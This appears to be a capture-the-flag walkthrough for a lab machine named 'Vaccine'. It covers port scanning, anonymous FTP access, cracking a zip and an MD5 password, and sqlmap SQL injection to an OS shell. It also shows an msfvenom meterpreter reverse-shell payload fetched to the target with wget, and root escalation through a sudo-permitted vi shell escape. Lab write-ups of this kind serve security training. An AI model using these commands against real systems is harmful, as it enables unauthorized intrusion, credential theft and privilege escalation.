An easy box with with a sql injection vulnerability.
Start with adding Vaccine to /etc/hosts then after the initial nmap scan we can service scan the 3 ports we discover.
sudo nmap -sC -sV -O -p21,22,80 vaccine.htb -oN nmap_second
FTP access allows anonymous login we can grab a file backup.zip from there. Trying to unzip this file we have a password protected zip file containingh index.php and style.css
We can use johns zip2john backup.zip > backup.zip.hash to create a readable hash we can feed to john to crack the zipfile. once complete feed to john with john backup.zip.hash and we find the password 741852963.
Checking the index.php we find some credentials admin and an md5 password which we can feed to crackstation.net and get qwerty789 Login to admin.
The next page we coem to has a search and using sqlmap to test for injection we get lucky sqlmap -u http://vaccine.htb/dashboard.php?search=1 --os-shell --cookie=PHPSESSID=o4htgfqc51canihdh9o93rdc44
we can use this to get a reverse shell on the target.
- generate payload
msfvenom -p linux/x86/meterpreter_reverse_tcp -f elf LHOST=10.10.16.193 LPORT=8765 > rev.elfand wget over to the target.
After setting up a multi handler with the correct payload ./rev.elf and get a shell. We could have also just read the .ssh file inside the postgres home dir and grab the id_rsa. Doing that now for a stable connection.
Inside the /var/www/html we find a dashboard.php with postgres creds. P@s5w0rd! allowing us to run sudo -l
1
2
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf- FOLLOWED BY
:!/bin/shand we are root.